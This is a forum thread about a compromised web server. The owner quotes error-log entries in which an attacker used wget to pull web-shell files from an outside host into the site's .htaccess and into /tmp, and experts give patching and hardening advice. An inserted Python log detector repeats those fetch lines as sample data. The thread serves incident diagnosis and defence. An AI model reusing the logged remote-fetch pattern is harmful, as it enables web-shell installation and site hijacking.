Solved

Server hacked, .htaccess file was changed

Posted on 2008-06-24
Last Modified: 2013-11-15
Hi experts,

I have a dedicated server with godaddy. It was attacked 3 times this morning. The .htaccess file on the server was modified and redirected to another IP: 64.28.191.117. It seems they are able to write anything to my server.
The following is the error log I got. It seems to be very helpful, but I still cannot figure out what the hole is and what I should do. Thanks a lot!

[-] prtctl: Invalid argument
[-] prtctl: Invalid argument
--06:09:21--  http://www.dr-schwab.de/shell2.txt
           => `/home/myweb/public_html/.htaccess'
Resolving www.dr-schwab.de... 82.165.104.215
Connecting to www.dr-schwab.de|82.165.104.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 210 [text/plain]

    0K                                                       100%   33.38 MB/s

06:09:21 (33.38 MB/s) - `/home/myweb/public_html/.htaccess' saved [210/210]

Question by: z_ruixiang
15 Comments
 
LVL 10

Expert Comment

by:Casey Herman
ID: 21856284
If this is some sort of NIX you can change your permission on the file to read only.

Casey
0
 
LVL 28

Expert Comment

by:Jan Springer
ID: 21856374
That doesn't help if there is an application that is vulnerable.

Are you using PHP?  What version?  What version of Apache?

Has GoDaddy been notified?
0
 
LVL 10

Expert Comment

by:Casey Herman
ID: 21856459
That is right because you can write code to change the file modes....

Casey
0
 

Author Comment

by:z_ruixiang
ID: 21856566
I have changed all the files to read only, but it didn't help.
Apache/2.0.52 running on CentOS 4.
PHP Version 4.3.9
0
 
LVL 28

Expert Comment

by:Jan Springer
ID: 21856630
Upgrade Apache and PHP.  Run modsecurity.  Don't walk to the task, run -- before it is too late.
0
 

Author Comment

by:z_ruixiang
ID: 21856736
Will this upgrading really help? Do I need to change my code if upgraded to PHP5?
0
 
LVL 28

Expert Comment

by:Jan Springer
ID: 21856899
If you are running a release of PHP or whatever that has a security vulnerability, then, YES, you need to upgrade.  If you don't want to go to PHP5, then upgrade to the latest PHP4.  And upgrade Apache while you're at it.  Install modsecurity v2.  Review your apache config file and don't load modules such as proxying, etc if you don't need or use them.
0
 

Author Comment

by:z_ruixiang
ID: 21857153
Based on the log info, can we tell whether it's because of the Apache or PHP version? I mean, I really want to know what and where the hole is, how they could write on my server.
0
 
LVL 28

Accepted Solution

by: Jan Springer (earned 500 total points)
ID: 21857372
I'd put my 2 cents on php.  Some interesting reading:

http://isisblogs.poly.edu/2008/02/23/reverse-engineering-a-php-virus/

If it were my machine, I'd scratch it and start over.  But do check that a rootkit hasn't been installed -> www.chkrootkit.org.  Look in /tmp for applications and/or data that do not belong.
0
 

Author Comment

by:z_ruixiang
ID: 21857700
I think you are right. I found this in error log:

--06:03:54--  http://www.dr-schwab.de/shell3.c
           => `/tmp/sys.c'
Resolving www.dr-schwab.de... 82.165.104.215
Connecting to www.dr-schwab.de|82.165.104.215|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,226 (3.2K) [text/x-csrc]

    0K ...                                                   100%   21.04 KB/s

06:03:55 (21.04 KB/s) - `/tmp/sys.c' saved [3226/3226]

And there is an unknown file in my /tmp.

Is it a security vulnerability of the PHP I have? I will upgrade it.
0
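The two wget transcripts quoted in this thread (the .htaccess overwrite in the question and the /tmp/sys.c fetch in the comment above) are exactly the kind of lines a log check should catch: a download started by the web server process that lands in the web root or in a world-writable temp directory. The following detector is an added example, not code from any poster; the sample log text and the web root path are constructed from the thread.

```python
import re
from pathlib import PurePosixPath

# Constructed sample, modelled on the wget output quoted in the thread
# (the PHP notice line is filler that must not be flagged).
SAMPLE_LOG = """\
[-] prtctl: Invalid argument
--06:03:54--  http://www.dr-schwab.de/shell3.c
           => `/tmp/sys.c'
Resolving www.dr-schwab.de... 82.165.104.215
06:03:55 (21.04 KB/s) - `/tmp/sys.c' saved [3226/3226]
--06:09:21--  http://www.dr-schwab.de/shell2.txt
           => `/home/myweb/public_html/.htaccess'
HTTP request sent, awaiting response... 200 OK
06:09:21 (33.38 MB/s) - `/home/myweb/public_html/.htaccess' saved [210/210]
[client 10.0.0.5] PHP Notice:  Undefined index: page in /home/myweb/public_html/index.php on line 12
"""

FETCH_RE = re.compile(r"^--(\d\d:\d\d:\d\d)--\s+(\S+)$")
DEST_RE = re.compile(r"^\s*=>\s+`([^']+)'$")
SAVED_RE = re.compile(r"^\d\d:\d\d:\d\d .* - `([^']+)' saved \[(\d+)/\d+\]$")

WEBROOT = "/home/myweb/public_html"           # assumed site root, taken from the thread
TEMP_DIRS = ("/tmp", "/var/tmp", "/dev/shm")  # world-writable drop locations

def parse_downloads(text):
    """Pair every wget start line with the path it wrote and the bytes saved."""
    events, cur = [], None
    for line in text.splitlines():
        if m := FETCH_RE.match(line):
            cur = {"time": m[1], "url": m[2], "dest": None, "bytes": None}
            events.append(cur)
        elif cur and (m := DEST_RE.match(line)):
            cur["dest"] = m[1]
        elif cur and (m := SAVED_RE.match(line)):
            cur["dest"], cur["bytes"] = m[1], int(m[2])
            cur = None                        # transfer finished; wait for the next start
    return events

def reasons_for(event):
    """Why a download that shows up in the web server's error log is suspicious."""
    dest, url_name = event["dest"] or "", PurePosixPath(event["url"]).name
    reasons = []
    if dest.startswith(WEBROOT + "/"):
        reasons.append("writes inside the web root")
    if PurePosixPath(dest).name == ".htaccess":
        reasons.append("overwrites .htaccess (redirect/hijack)")
    if any(dest.startswith(d + "/") for d in TEMP_DIRS):
        reasons.append("drops a file in a world-writable temp dir")
    if dest.endswith(".c"):
        reasons.append("C source fetched to be compiled locally")
    if "shell" in url_name.lower():
        reasons.append("URL filename suggests a web shell")
    return reasons

def suspicious_downloads(text):
    """Return (url, dest, reasons) for every flagged transfer, in log order."""
    return [(e["url"], e["dest"], reasons_for(e))
            for e in parse_downloads(text) if reasons_for(e)]
```

Running it over the real error log (for example `suspicious_downloads(open("/var/log/httpd/error_log").read())`) gives the timeline of what was fetched and where it was written, which is the starting point for the /tmp review the accepted answer recommends.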
 

Author Comment

by:z_ruixiang
ID: 21857755
Could you give me some instruction on how to upgrade to php5?
0
 
LVL 28

Expert Comment

by:Jan Springer
ID: 21857886
The problem with this is that applications could have been re-compiled by the hacker and you most likely have no idea which apps these are.

Move your webserver temporarily somewhere else and re-install is my suggestion.
0
 

Author Comment

by:z_ruixiang
ID: 21857961
I ran "yum update php", but it seems 4.3.9 is the latest version I can get.
0
 

Author Comment

by:z_ruixiang
ID: 21877321
What should I do to prevent it from being attacked if I get a new server? I'm not sure whether they still do that if I move to a totally new server.
0
 
LVL 28

Expert Comment

by:Jan Springer
ID: 21877468
1) install all of the latest versions of kernel and apps
2) keep a spreadsheet of current OS and application versions installed
3) subscribe to bugtraq at www.securityfocus.com
4) run modsecurity v2 with Apache 2.2.x
5) use iptables
6) periodically update and run chkrootkit -> www.chkrootkit.org
7) turn globals off in php
8) sanitize input variables to scripts and cgis
0
